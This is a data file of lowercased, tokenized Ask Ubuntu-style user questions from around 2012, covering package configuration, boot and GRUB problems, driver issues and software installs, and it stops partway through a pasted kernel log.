187337	unattended grub configuration after kernel upgrade	today i have been working on automatic deployment of an ubuntu server . i got stuck on automatic updating of the server using apt-get upgrade trying to upgrade to a new kernel . the log looks like this : setting up linux-image-3.2.0-24-generic ( 3.2.0-24.39 ) ... testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst ( ... ) then a question is presented : package configuration ┌─────────────────────────────────┤ ├─────────────────────────────────┐ │ a new version of /boot/grub/menu.lst is available , but the version │ │ installed currently has been locally modified . │ │ │ │ what would you like to do about menu.lst ? │ │ │ │ install the package maintainer 's version │ │ keep the local version currently installed │ │ show the differences between the versions │ │ show a side-by-side difference between the versions │ │ show a 3-way difference between available versions │ │ do a 3-way merge between available versions ( experimental ) │ │ start a new shell to examine the situation │ │ │ │ │ │ < ok > │ │ │ └──────────────────────────────────────────────────────────────────────┘ the desired outcome would be to select the first option and to continue : replacing config file /run/grub/menu.lst with new version updating /boot/grub/menu.lst ... done after running the upgrade by hand , i used debconf-get-selections to inspect the correct answer for the question ( see other settings ) . it seems like update_grub_changeprompt_threeway is the question that should be answered . however , setting this using debconf-set-selections presented me with the same question : debconf-set-selections < < < `` grub grub/update_grub_changeprompt_threeway select install_new '' apt-get -y dist-upgrade how can this question be automated ?
187339	how to install processing in edubuntu 12.04	can you help me , please ? i have edubuntu installed in my computer and i need to install processing . how can do it ? best regards
187342	issues with software sources	i just got a problem with software installation and software sources on my ubuntu . i cant use application manager to install anything : could not download all repository indexes the repository may no longer be available or could not be contacted ... . also if i go to software sources > select best server > choose the best server , then it wants me to reload and then again gives me the same problem . i do have internet connection and my ubuntu version is 9.04 .
187344	why does this 'kill ' command log me out of the computer ?	the following command signs me out ( do not run this command ) : kill -9 -1 i do n't understand why . can someone explain this to me ?
187347	x-plane 10 does n't run due to `` annot find autorun program ''	i am trying to install x-plane 10 global ( i 1000 version dvd version x-plane 10 ) on ubuntu 12.04 ( 64-bit ) and i am getting the following message : error autorunning software can not find autorun program what shall i do ?
187354	install ubuntu splitted in two devices i.e . hdd and sd card	can i install ubuntu so that most accessed files reside on ssd 2gb ( old ausus eee 2gb ) and remainder of files reside on large sd card in card slot ?
187356	ca n't find localhost files	hope you can help . this is my first time trying ubuntu/linux . i am logged in as root i have downloaded and installed lamp and phpmyadmin . i get the test page under localhost say that it works and is installed correctly . i have also put my files in the /var/www . they are php files when i put the address localhost/ ( page name.php ) i get an error saying not found the requested url /index.php was not found on this server . apache/2.2.22 ( ubuntu ) server at localhost port 80 i have put the files in the wrong folder ? ? if i look in the `` /etc/ap [ ache2/sites-available/default '' , it tells my my documentroot is /var/www would love somehelp on this please many thanks gf
187359	problems with libconfig pkg_config_path enviroment variable	i 've coded a project with some files in c. to make it easy for the user to start the program i started to generate a cfg-file . for this reason i installed libconf . unfortunately on compiling with a example file of libconfig i get this message . gcc $ ( pkg-config -- cflags -- libs libconfig ) example1.c -o example1 example.cfg example1.c : in function »main« : example1.c:43:13 : warning : format » % s« expected argumenttyp »char *« , but argument 3 has typ »int« [ -wformat ] ... .. as i got told i installed sudo apt-get install libconfig8-dev and was hoping not setting up any pkg_config_path . it looks like it 's not compiling correct .
187373	how do i assign different sounds to events ?	i 'd like to know what menu to access to assign different sounds to events , like a thunderbird email arrival . i can not find the menu described here . i am running 12.04 .
187374	monitor flickering while using nvidia card	i have an nvidia geforce gt 500 series card , and can not install the video driver needed : additional drivers does n't find any downloading and installing the driver from the nvidia website does n't work ctrl+alt+f1 gives an error ( `` no native mode , forcing panel scaling ) my monitor stays flickering
187376	how to composite videos and make animations in ubuntu ?	well , i 'm not talking about programs like nukex , cinelerra , jahshaka because they are n't either free or feature rich . i have seen couple of cool videos done on linux platform , most likely to be ubuntu . how linux is built - linux foundation ubuntu 12.10 beta overview - omg ! ubuntu what is the magic application they are using to composit those videos.. ? can upcoming lightworks workout these effects ... ? is there any linux native opengl based application to deal with particles , just like particle illusion for windows ? thanks !
187381	how to find the .desktop files for pinned applications in the unity launcher ?	i know the desktop files live in /usr/share/applications and ~/.local/share/applications . i 'm looking for 2 information : where can i see the desktop items that show in my launcher ( i would love to have right-click properties on the launcher ) update : moved this part of my question to another entry to be able to give credit : '' when i type into the dash applications show up with their title , how can i find the associated desktop file ( again right click is missing ) ''
187389	is it possible to open an access 2010 database file without using wine or virtualbox ?	i have a .accdb file created with microsoft office 2010 and i want to know if it is possible to open it with some native ubuntu application like libreoffice or openoffice , i know libreoffice has libreoffice base but i ca n't figure out how to open or if it 's even possible to open a .accdb file . is there any way i can open a .accdb file without wine or virtualbox ?
187391	how to remove cairo dock from start up ?	i have cairo dock 's version 3.0.0.1 installed and i 've added it on start up . now i want to remove it from start up , how i can do the same ? please help me !
187395	download wubi 10.04	i would like to download an older version of ubuntu ( 10.04 for instance ) . does anyone know where can i find the windows installer ? ( note : i do n't want to burn to disk )
187398	install to usb without touching windows mbr	i would like as full of an install as possible ( most notably no casper , just straight on the drive ) on a usb stick , but i 'm not allowed to touch the current configuration of the computer i 'll be running it on at all ( except of course changing the boot options to boot from usb ) . most guides i read are about getting a live install with persistence on usb , or ( i think ) still replace the mbr with grub . is there any way to combine the two , and not touch the underlying system ?
187400	wake up from suspend to ram problem	i have very strange problem . after suspending to ram notebook does n't wakes up , only leds and fan switches on , no hdd activity and display stays off ( without backlights-completly off ) . if i press numlock- led does n't switches , all buttons are not warkable . i have installed uswsusp and tryed to use s2ram , but result is exactly similar . i tryed to remove fglrx , but useless . i have hp pavilion dv6 2055er with ubuntu 12.04 on board and : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710 [ mobility radeon hd 4500/5100 series ] how can i solve this problem ?
187401	ubuntu desktop on pc as an ipv6 router ?	i have a dell pc with ubuntu 12.10 and a pandaboard running the latest linaro ubuntu 12.08 . the ethernet on the panda board is reporting 'no ipv6 router present ' regardless of what router i connect ( they are all probably not ipv6 ) . i can connect via a cross-over ethernet cable the pandaboard to the dell pc . can i setup the dell pc to act as an ipv6 router . the pc has a wireless connect to our router/adsl box . i would really appreciate some help here so if you have an alternative please suggest it .
187404	stable version of ubuntu	my question is simple : which edition of ubuntu is the most stable , reliable , fast and nice ? and also , should i prefer ubuntu , kubuntu , lubuntu or mythbuntu ? note : i want it to be as fast as possible . note [ 2 ] : i will install ubuntu with wubi .
187406	java 1.7 update 07 and google chrome	i 've just updated java from 1.6 to 1.7 via the software centre - removing the old java 1.6 and selecting the new java 1.7 . firefox works fine . but when i use google chrome to access a java test website it says the plugin is out of date . i click on run anyway and it says that it 's running version 1.7 . i 've cleared chrome 's cache and plugin data and this has n't changed anything . anyway ideas ? ( ps . it 's ubuntu 12.04 64 bit )
187408	livecd/usb boot issues with ubuntu 12.04 on blank drive	not sure how common this issue is , or even how badly i may be missing something simple , but i am a first time user having some serious problems . some background : old hdd running windows 7 developed too many bad sectors and is bricked . i 'm attempting to install ubuntu 12.04 on a fresh 1tb drive by booting from a liveusb . i 've not been able to get past the initial menu screen , however , as the process stalls out shortly after selecting an option ( both boot from drive and install to drive ) . i 've tried multiple usb drives as well as cds , modified the boot order , flashed bios , and even tried booting with only the flash drive and the keyboard connected with the same results . typically what i observe is that the os begins what i think is compiling , listing drivers and components before freezing on one . when the keyboard is plugged in , its the keyboard driver , before i flashed bios , it was a bios related item , now its an unknown entry . the computer seems to be reading the drive ( indicated by usb light flashing or cd drive reading ) for roughly 10 minutes with no progress , followed by the drives going quiet . some spec info : motherboard : asus p5q pro , bios version 2102 ( latest version ) , intel chipset cpu : intel core 2 duo e8400 wolfdale 3.0ghz help would be appriciated !
187411	is it safe to install the / partition on an ssd ?	i 've just purchased a laptop dell inspiron 14z , with a hdd with 500g and a ssd with 32gb . i installed 12.04 on it , setting the partitioning table like this : /home and swap partitions in the hdd , / partition in the ssd . two days after installing , i changed some configuration file in the / partition , and after rebooting , the bios would n't recognize the ssd anymore . the livecd was seeing it , but only with a size of 1gb . eventually i had to call the technical support and i had the ssd replaced . the thing is , the technician told me that , even though i was playing with the partitions , probably the ssd was faulty . however , now i doubt . maybe ubuntu was accessing too often to the ssd or something , so that it got overloaded and crashed . my question is : is it safe to install the / partition in the ssd ? do i have to have especial care when installing ? ( i 've read about setting a partition for /boot , and even to leave the first 500mb of the ssd untouched , due to the mbr configuration , but i am not really sure if that would help ) . any tip will be more than welcome .
187413	custom hot key for terminal command	i want to hit f1 and have a string with return key to be typed automatically into the terminal i am in . i do not want to do it with bash_profile because i want it to be configured locally in once place not on every server i ssh in to . how do i do that ?
187415	what cctv software is available ?	i would like to setup ubuntu to capture motion in my studio and e-mail pictures of anyone who enters it . ms windows has plenty of software to do this , but now that i switched 100 % to ubuntu , i need a software to accomplish this . ideas ?
187417	right mouse button doesnt work on a lenovo ideapad y580	i have installed ubuntu 12.04.1 on my new lenovo ideapad y580 m772dge . unfortunately the right mouse button is not working correctly . every mouse button click is interpreted as a left mouse button click . i tried to uninstall and reinstall the synaptics ( xserver-xorg-input-synaptics ) drivers , but the problem is still present . what else can i do ? any other suggestions ? btw : my touchpad doesnt have a `` middle mouse button '' . is it possible to emulate a `` middle mouse click '' with a keybord shortcut ?
187418	thunderbird 15.0 - in options- > copy to disappeared folder list	in thunderbird 15.0 on kubuntu 12.04 64bit disappeared the folder list in the copy to menu to reproduce select write ( new message ) appears a new window select options selcet copy to - appears a little white point instead of the folder list same problem on two different notebooks ; one upgraded from 11.04 and the other with a clean 12.04 installation . seems related to the 15.0 version
187421	unable to install wubi on windows 7 home premium 64bit	when i try to install wubi in a partition made on my hard disk i get a error message saying '' could not retrive the required disk image file for furthur details goto the c : \users\raghavadss\appdata\local\temp\wubi-12.04-rev269.log file '' which i have pasted in the link http : //paste.ubuntu.com/1202911/
187424	install windows 7 through virtual box	i am using ubuntu 12.04 . i want to install windows 7 on my system from a cd through virtualbox . i searched the detailed tutorials through google but i did not find one that worked . so can some one kindly share any detailed tutorial or link which will really help me out .
187428	running airport utility under wine ?	i ca n't get aputil.exe running under wine . i installed version 5.5.3 under wine-1.5.12 . i 'm on ubuntu 12.04 . when i try to run it , here 's what i get : $ wine aputil.exe fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : advapi : registereventsourcew ( ( null ) , l '' bonjour service '' ) : stub fixme : winsock : wsaioctl ws_sio_udp_connreset stub fixme : winsock : wsaioctl - > sio_address_list_change request : stub fixme : iphlpapi : createipforwardentry ( proute 0x78e944 ) : stub fixme : service : enumservicesstatusw resume handle not supported fixme : service : enumservicesstatusw resume handle not supported fixme : advapi : reporteventa ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x78e5a8 , ( nil ) ) : stub fixme : advapi : reporteventw ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x12e840 , ( nil ) ) : stub fixme : netapi32 : netgetjoininformation semi-stub ( null ) 0x78e664 0x78e66c fixme : winsock : wsaioctl ws_sio_udp_connreset stub err : module : import_dll loading library dnssd.dll ( which is needed by l '' c : \\program files ( x86 ) \\airport\\aputil.exe '' ) failed ( error c000007b ) . err : module : ldrinitializethunk main exe initialization for l '' c : \\program files ( x86 ) \\airport\\aputil.exe '' failed , status c0000135 fixme : advapi : reporteventa ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x78e5a4 , ( nil ) ) : stub fixme : advapi : reporteventw ( 0xcafe4242,0x0004,0x0000,0x00000064 , ( nil ) ,0x0001,0x00000000,0x12e1a8 , ( nil ) ) : stub i have n't used wine since about 2001 . incidentally , version 5.6.1 is available , but it complains that it requires windows 7 sp1 .
187429	how to add firefox profiles to quick list for firefox launcher ?	i have three separate firefox profiles , and while i have no problem running them at the same time ( via profileswitcher add-on ) , the default behavior of the unity launcher 's firefox icon is to launch the profile that was used last . most of this time , this is fine , but sometimes i 'd like to select which one i 'd like to run . i am thinking that a quicklist menu on the firefox launcher is a better way to do this than having multiple launchers . however , i 'm not sure how to do this .
187431	a serious grub issue	everything went on well . today morning when i rebooted my workstation , i was appalled by the grub rescue screen that appeared on boot up . i could not guess what could be the reason for this . trying to find out a solution , i googled and browsed several sites and performed the following commands from a live cd . sudo mount /dev/sda2 /mnt sudo grub-install /dev/sda /mnt i later recognized that i should have installed grub in sda1 and not in sda2 . sda2 is my ubuntu partition with all my data . on reboot , i was further taken aback by appearance of a grub prompt . on googling again , i was instructed to run find command in grub . i then got this error . grub > unknown command find not knowing what to do , i booted again using a live cd . i felt awwww when i saw my 2 tb file system showing only five folders leaving out the main home folder which contained all the users and the data . i assumed that i have made a mistake by installing grub on /dev/sda2 and it has replaced ubuntu and the data . i then tried several solutions given online . like i tried to recover using boot-repair , followed this link http : //www.dedoimedo.com/computers/grub-2.html # moztocid842078 and tried to chroot . on giving chroot i get chroot : can not run command /bin/bash no such file or directory i have also pasted the bootscriptinfo results for your reference . http : //paste.ubuntu.com/1202960/ kindly help me out . is my presumption correct ? has grub replaced the ubuntu partition and all its data ? how could i bring my machine back to its original state ?
187432	receiving bluetooth files from nexus 7	i have successfully paired and connected my nexus 7 with my ubuntu 12.04 pc . i have successfully sent files from the pc to my android device , but when i try to send files from android to ubuntu , the nexus 7 reports 'request can not be handled correctly ( i select file to transfer , then select : share via bluetooth , then select my ubuntu pc ) thanks if you can help .
187435	repo preferences over one to another ?	if a same software ( different version ) are present in two repos both added in sources.list then which one will get installed when i run install command apt-get install x ? also how can i choice one repo over another if both provide application with same name ?
187439	is there a wifi driver for ar5523 chipset , on linux kernel 3.2+ ?	i found this : http : //wireless.kernel.org/en/users/drivers/ar5523 but when i svn co and then try to compile it i get errors [ errors here : http : //pastebin.com/8bsvk9ev ] . i do n't think it was coded for linux kernel 3.2.x and i have 3.2.0-30-generic . i tried to install ndiswrapper but when i run it i get : # ndiswrapper error : unable to find a version of ndiswrapper ! so i 've hit a wall , does anyone know how to get the driver for this atheros wifi chipset ? thanks
187440	how do i add a boot from cd option to yaboot ?	so i 'm dual-booting ubuntu 12.04.1 on my imac g5 powepc alongside mac os x and i want to add a boot cd option to yaboot because i 'm trying to boot a scratched mac os x installation dvd that takes a while to read and the frst bootstrap moves on too fast . how do i edit the timeout for the first bootstrap anyways ? so , my main question is , how do i add a cd booting option to yaboot and then , how doi boot it ? the devalias from openfrmware tells me that 1 have 2 cd-rom instaled , on is /ht/pci @ 3/ata-6/disk @ 0 and the other on ends with a 1 instead of a zero . these are the contents of my yaboot.conf file : yaboot.conf generated by the ubuntu installer run : `` man yaboot.conf '' for details . do not make changes until you have ! ! see also : /usr/share/doc/yaboot/examples for example configurations . for a dual-boot menu , add one or more of : bsd=/dev/hdax , macos=/dev/hday , macosx=/dev/hdaz boot= '' /dev/disk/by-id/scsi-sata_st3160023as_5mt1gcwa-part2 '' device=/ht @ 0 , f2000000/pci @ 3/k2-sata-root @ c/ @ 0/ @ 0 partition=4 root= '' uuid=798a048f-ee48-49e0-bba3-111aed8dee04 '' timeout=12000 install=/usr/lib/yaboot/yaboot magicboot=/usr/lib/yaboot/ofboot enablecdboot macosx= '' /dev/disk/by-id/scsi-sata_st3160023as_5mt1gcwa-part3 '' image=/boot/vmlinux label=linux read-only initrd=/boot/initrd.img append= '' quiet splash '' what do i add here so that yaboot will boot from my cd in like 3 minutes after startup ? thanks !
187446	if i create a link to a folder , how can i get from that linked folder to the `` real '' folder from within nautilus ?	say i have a folder several layers down in my documents folder . and i want easy access to it from my desktop . to do that i : go to the parent folder in nautilus . right click on the folder 's icon and choose make link cut / paste the new `` link to ... '' folder onto my desktop . great . and mostly this works fine for me . but suppose i want to get to that folder 's parent . i can of course get there using the original path -- what nautilus calls the `` link path '' which i can see in the properties of the folder . but that seems harder than it ought to be . how can i click on the folder and go to the link path directly ?
187448	ca n't check for/download updates	i 've noticed i ca n't check for new updates , neither via terminal nor update manager . for example , update manager throws error saying something like `` failed to download repository information . check your internet connection '' . details are the following : w : failed to fetch http : //ppa.launchpad.net/slicer/ppa/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/slicer/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . i did a bit of googling , still could n't find any solution : /
187454	could not write bytes : broken pipe	what does this message displayed on a black screen before the login prompt mean ? should it be cause for concern ? how should i respond to it ? i have one network drive , and two internal drives ; one ext4 , one ntfs .
187457	how do i enter single user mode when dual-booting mac os x and ubuntu ?	so i 'm dual-booting ubuntu 12.04.1 for powerpc64 alongside my mac os x on an imac g5 . how do i enter single user mode now that i have yaboot installed ? is there a command from openfirmware ? thanks !
187458	ubuntu 12.04 hangs on install using vmware player on windows 7	at my job , we 're migrating to ubuntu 12.04 from 10.10 ( we skipped a generation ) , so everyone needs to make one or more new virtual machines for 12.04 on their windows 7 workstation . the problem is , only some have had success while most encounter a hang during install . i was tasked with researching this problem and here are my findings ( while somewhat inconclusive ) i have tried uninstalling and reinstalling vmware player , using versions 4.0.2 , 4.0.4 , and 5.0.0 but every install hangs at `` retrieving file 55 of 129 . '' additionally i have installed before updating the vmware tools , as well as after ( one can pre-download them ) with every install hanging at `` retrieving file 55 of 129 . '' the file i was using for the above two is called : ubuntu-12.04-desktop-amd64.iso i have burned a disc with ubuntu-12.04.1-desktop-amd64.iso and tried to install it , and later tried ubuntu-12.04.1-desktop-i386.iso ( which is not what i want but i wanted to see if it would work ) , but both times i get '' pxe-e53 : no boot filename recieved pxe-m0f : exiting intel pxe rom . operating system not found '' this is all in vmware and the goal is to find a settings recipe that will allow an unbroken 64bit ubuntu 12.04 install from an .iso hosted on the windows os . thank you in advance to anyone with ideas !
187460	how can i choose which menubar indicators are shown in 12.04 ?	i 'd like to be able to tweak the set of shortcuts on the right side of the menubar in 12.04 ( e.g . remove the email shortcut , remove the wifi shortcut on my laptop , add a lock screen shortcut so i can lock the screen with a single click rather than facing the choice between two clicks and ctrl-alt-l ) . is this possible ? the only thing i can find to configure in the settings is the date/time display .
187462	how can i stop the kde-telepathy ui from appearing under unity when i use the messaging menu ?	kde telepathy keeps getting in the way every time i try to use empathy from the messaging menu . if i get a message , it opens in the kde telepathy ui instead of in empathy . this is rather frustrating as it causes a delay before it opens , and is not integrated with empathy . how can i stop this from happening ? this still happens in 12.10 and i 've had to remove the kde-telepathy packages . is there a solution ?
187464	installing matlab 2012a ( 32-bit ) in ubuntu 12.04 lts java problem	this is my first posting here , so please be gentle . i am having a problem installing matlab 2012a ( 32-bit ) in ubuntu 12.04 lts . i have trawled around the web and have seen similar problems reported , but i can not seem to get around the issue , my problem is very similar to the one reported here : http : //www.mathworks.in/matlabcentral/answers/42988-installing-matlab-2012a-in-ubuntu-12-04-java-problem except that i get an error message that refers to the java module located in glnx86 : /tmp/mathworks_2247/sys/java/jre/glnx86/jre rather than glnxa64 . here is my problem . i have installed the matlab installation software here : /home/usr/desktop/matlab_installation i first used chmod +x install to convert the install file to an executable file . i then used the sudo ./install -v command to install matlab . here is the output : sudo ./install -v [ sudo ] password for usr : preparing installation files ... - > dvd = /home/usr/desktop/matlab_installation - > arch = glnx86 - > display = :0 - > testonly = 0 - > jre_loc = /tmp/mathworks_2247/sys/java/jre/glnx86/jre - > ld_library_path = /tmp/mathworks_2247/bin/glnx86 command to run : /tmp/mathworks_2247/sys/java/jre/glnx86/jre/bin/java -splash : '' /home/usr/desktop/matlab_installation/java/splash.png '' -djava.ext.dirs=/tmp/mathworks_2247/sys/java/jre/glnx86/jre/lib/ext : /tmp/mathworks_2247/java/jar : /tmp/mathworks_2247/java/jarext : /tmp/mathworks_2247/java/jarext/axis2/ : /tmp/mathworks_2247/java/jarext/guice/ : /tmp/mathworks_2247/java/jarext/webservices/ com/mathworks/professionalinstaller/launcher -root `` /home/usr/desktop/matlab_installation '' -tmpdir `` /tmp/mathworks_2247 '' installing ... /tmp/mathworks_2247/sys/java/jre/glnx86/jre/bin/java : error while loading shared libraries : libjli.so : can not open shared object file : no such file or directory finished i then attempted the command chmod +x /sys/java/jre/glnx86/jre/java to convert matlab 's java to an executable . i have tried this in a number of ways from navigating through the directory structure in the terminal window ( and converting ) to using the point and click navigation system and right clicking on java and converting it to an executable . all of these work fine , the file appears as an executable file , here is how the java file appears using ls -l : -rwxrwxr-x 1 usr usr 47308 sep 13 13:23 java it is clearly listed as executable . however , i continue to get the error message : installing ... /tmp/mathworks_2387/sys/java/jre/glnx86/jre/bin/java : error while loading shared libraries : libjli.so : can not open shared object file : no such file or directory finished when using sudo ./install . what am i doing wrong ? i have tried systematically converting the java @ /glnx86/jre/bin/java to an executable ( and back again ) without success . notice that in contrast to previous posts i seem to be having an issue with the glnx86 java rather than the glnxa64 , could this be the source of the problem ? any help would be gratefully received . regards
187467	problem installing youtube lens	i get an e : unable to locate package lens-video error after running : sudo apt-get update & & sudo apt-get install lens-video scope-youtube i have the video lens in dash working .
187471	is it possible to install a specific package from proposed repos ?	i am currently running ubuntu 12.04 . i intend to do so for the future because of its long time support and stability . however , i would like to contribute to testing proposed updates for precise . i know that the proposed updates can be enabled through software sources . however doing so will install all proposed updates . however , i would like to test only a specific package ( unity ) and its dependencies . how would i go about doing this ?
187477	how to rename files with count ?	i have a directory like this : randomized_quad015.png randomized_quad030.png randomized_quad045.png randomized_quad060.png randomized_quad075.png randomized_quad090.png randomized_quad1005.png randomized_quad1020.png randomized_quad1035.png randomized_quad1050.png randomized_quad105.png randomized_quad1065.png randomized_quad1080.png randomized_quad1095.png randomized_quad1110.png randomized_quad1125.png randomized_quad1140.png and i want to rename the first files adding 0 in front of number , like : randomized_quad0015.png but i do n't know how . some help ?
187484	grooveshark apps on ubuntu	what applications are available for grooveshark in ubuntu , i 'm in need of one that supports media keys . being generally `` pretty '' would be a plus too . what i really want is a plugin for rhythmbox but that does not seem to be available . so the next best thing would be something that works close to rhythmbox .
187489	files disappeared after using chmod	i set my /var/www/wordpress folder to 744 permissions and all of the files within disappeared . if i right click the /wordpress folder and click properties , it says there are 0 bytes in the folder but that should n't be the case .
187494	openoffice calc does n't show up in the alt-tab window switcher	i just upgraded to ubuntu 12.04 , and it 's mostly working . my biggest problem so far : openoffice/libreoffice calc does n't show up under the task switcher . when i pres alt-tab to change windows , i can see all my windows except for any openoffice documents i have open . if i minimize other windows , then i can get to my calc documents , but alt-tab just does n't work . it only seems to be a problem with calc . writer and impress both work fine . i do a lot of work in spreadsheets , so this is really messing up my flow . any thoughts on how to fix it ?
187497	does hauppauge wintv hvr-900 ( r2 ) [ usb id 2040:6502 ] work with ubuntu 12.04 lts ?	i have this dvb+analog usb tv tuner hauppauge wintv hvr-900 ( r2 ) [ usb id 2040:6502 ] . this used to work under ubuntu 10.04 lts . but in 12.04 there seems to be a problem . i have linux-firmware-nonfree and ivtv-utils installed . i am running ubuntu 12.04.1 lts 64 bit with all updates installed and the default unity environment . when i run mplayer tv : // -tv driver=v4l2 : device=/dev/video1 : input=1 : norm=pal i get a solid green screen and no picture . here input 1 is the composite input of the card . mplayer svn r34540 ( ubuntu ) , built with gcc-4.6 ( c ) 2000-2012 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing tv : // . tv file format detected . selected driver : v4l2 name : video 4 linux 2 input author : martin olschewski comment : first try , more to come ; - ) selected device : hauppauge wintv hvr 900 ( r2 ) tuner cap : tuner rxs : capabilities : video capture vbi capture device tuner audio read/write streaming supported norms : 0 = ntsc ; 1 = ntsc-m ; 2 = ntsc-m-jp ; 3 = ntsc-m-kr ; 4 = ntsc-443 ; 5 = pal ; 6 = pal-bg ; 7 = pal-h ; 8 = pal-i ; 9 = pal-dk ; 10 = pal-m ; 11 = pal-n ; 12 = pal-nc ; 13 = pal-60 ; 14 = secam ; 15 = secam-b ; 16 = secam-g ; 17 = secam-h ; 18 = secam-dk ; 19 = secam-l ; 20 = secam-lc ; inputs : 0 = television ; 1 = composite1 ; 2 = s-video ; current input : 1 current format : yuyv v4l2 : current audio mode is : mono v4l2 : ioctl set format failed : invalid argument v4l2 : ioctl set format failed : invalid argument v4l2 : ioctl set format failed : invalid argument v4l2 : ioctl query control failed : invalid argument v4l2 : ioctl query control failed : invalid argument v4l2 : ioctl query control failed : invalid argument v4l2 : ioctl query control failed : invalid argument failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory [ vdpau ] error when calling vdp_device_create_x11 : 1 ========================================================================== opening video decoder : [ raw ] raw uncompressed video movie-aspect is undefined - no prescaling applied . vo : [ xv ] 640x480 = > 640x480 packed yuy2 selected video codec : [ rawyuy2 ] vfm : raw ( raw yuy2 ) ========================================================================== audio : no sound starting playback ... v4l2 : select timeout v : 0.0 2/ 2 ? ? % ? ? % ? ? , ? % 0 0 v4l2 : select timeout v : 0.0 4/ 4 ? ? % ? ? % ? ? , ? % 0 0 v4l2 : select timeout v : 0.0 6/ 6 ? ? % ? ? % ? ? , ? % 0 0 v4l2 : select timeout v4l2 : 0 frames successfully processed , 1 frames dropped . exiting ... ( quit ) here is the dmesg of the card when plugged in.. [ 12742.228097 ] usb 1-4 : new high-speed usb device number 3 using ehci_hcd [ 12742.367289 ] em28xx : new device wintv hvr-900 @ 480 mbps ( 2040:6502 , interface 0 , class 0 ) [ 12742.367296 ] em28xx : audio vendor class interface 0 found [ 12742.367585 ] em28xx # 0 : chip id is em2882/em2883 [ 12742.550086 ] em28xx # 0 : i2c eeprom 00 : 1a eb 67 95 40 20 02 65 d0 12 5c 03 82 1e 6a 18 [ 12742.550104 ] em28xx # 0 : i2c eeprom 10 : 00 00 24 57 66 07 01 00 00 00 00 00 00 00 00 00 [ 12742.550120 ] em28xx # 0 : i2c eeprom 20 : 46 00 01 00 f0 10 02 00 b8 00 00 00 5b e0 00 00 [ 12742.550135 ] em28xx # 0 : i2c eeprom 30 : 00 00 20 40 20 6e 02 20 10 01 01 01 00 00 00 00 [ 12742.550150 ] em28xx # 0 : i2c eeprom 40 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 12742.550165 ] em28xx # 0 : i2c eeprom 50 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 12742.550181 ] em28xx # 0 : i2c eeprom 60 : 00 00 00 00 00 00 00 00 00 00 18 03 34 00 30 00 [ 12742.550196 ] em28xx # 0 : i2c eeprom 70 : 32 00 37 00 38 00 32 00 33 00 39 00 30 00 31 00 [ 12742.550211 ] em28xx # 0 : i2c eeprom 80 : 00 00 1e 03 57 00 69 00 6e 00 54 00 56 00 20 00 [ 12742.550226 ] em28xx # 0 : i2c eeprom 90 : 48 00 56 00 52 00 2d 00 39 00 30 00 30 00 00 00 [ 12742.550241 ] em28xx # 0 : i2c eeprom a0 : 84 12 00 00 05 50 1a 7f d4 78 23 fa fd d0 28 89 [ 12742.550257 ] em28xx # 0 : i2c eeprom b0 : ff 00 00 00 04 84 0a 00 01 01 20 77 00 40 1d b7 [ 12742.550272 ] em28xx # 0 : i2c eeprom c0 : 13 f0 74 02 01 00 01 79 63 00 00 00 00 00 00 00 [ 12742.550287 ] em28xx # 0 : i2c eeprom d0 : 84 12 00 00 05 50 1a 7f d4 78 23 fa fd d0 28 89 [ 12742.550302 ] em28xx # 0 : i2c eeprom e0 : ff 00 00 00 04 84 0a 00 01 01 20 77 00 40 1d b7 [ 12742.550317 ] em28xx # 0 : i2c eeprom f0 : 13 f0 74 02 01 00 01 79 63 00 00 00 00 00 00 00 [ 12742.550334 ] em28xx # 0 : eeprom id= 0x9567eb1a , eeprom hash = 0x2bbf3bdd [ 12742.550338 ] em28xx # 0 : eeprom info : [ 12742.550340 ] em28xx # 0 : ac97 audio ( 5 sample rates ) [ 12742.550343 ] em28xx # 0 : 500ma max power [ 12742.550346 ] em28xx # 0 : table at 0x24 , strings=0x1e82 , 0x186a , 0x0000 [ 12742.552590 ] em28xx # 0 : identified as hauppauge wintv hvr 900 ( r2 ) ( card=18 ) [ 12742.555516 ] tveeprom 15-0050 : hauppauge model 65018 , rev b2c0 , serial # 1292061 [ 12742.555523 ] tveeprom 15-0050 : tuner model is xceive xc3028 ( idx 120 , type 71 ) [ 12742.555529 ] tveeprom 15-0050 : tv standards pal ( b/g ) pal ( i ) pal ( d/d1/k ) atsc/dvb digital ( eeprom 0xd4 ) [ 12742.555534 ] tveeprom 15-0050 : audio processor is none ( idx 0 ) [ 12742.555537 ] tveeprom 15-0050 : has radio [ 12742.570297 ] tuner 15-0061 : tuner -1 found with type ( s ) radio tv . [ 12742.570327 ] xc2028 15-0061 : creating new instance [ 12742.570332 ] xc2028 15-0061 : type set to xceive xc2028/xc3028 tuner [ 12742.573685 ] xc2028 15-0061 : loading 80 firmware images from xc3028-v27.fw , type : xc2028 firmware , ver 2.7 [ 12742.624056 ] xc2028 15-0061 : loading firmware for type=base mts ( 5 ) , id 0000000000000000 . [ 12744.126591 ] xc2028 15-0061 : loading firmware for type=mts ( 4 ) , id 000000000000b700 . [ 12744.153586 ] xc2028 15-0061 : loading scode for type=mts lcd nogd mono if scode has_if_4500 ( 6002b004 ) , id 000000000000b700 . [ 12744.280963 ] registered ir keymap rc-hauppauge [ 12744.281151 ] input : em28xx ir ( em28xx # 0 ) as /devices/pci0000:00/0000:00:1a.7/usb1/1-4/rc/rc1/input10 [ 12744.281541 ] rc1 : em28xx ir ( em28xx # 0 ) as /devices/pci0000:00/0000:00:1a.7/usb1/1-4/rc/rc1 [ 12744.282454 ] em28xx # 0 : config register raw data : 0xd0 [ 12744.284709 ] em28xx # 0 : ac97 vendor id = 0xffffffff [ 12744.285829 ] em28xx # 0 : ac97 features = 0x6a90 [ 12744.285832 ] em28xx # 0 : empia 202 ac97 audio processor detected [ 12744.359211 ] em28xx # 0 : v4l2 driver version 0.1.3 [ 12744.404066 ] xc2028 15-0061 : 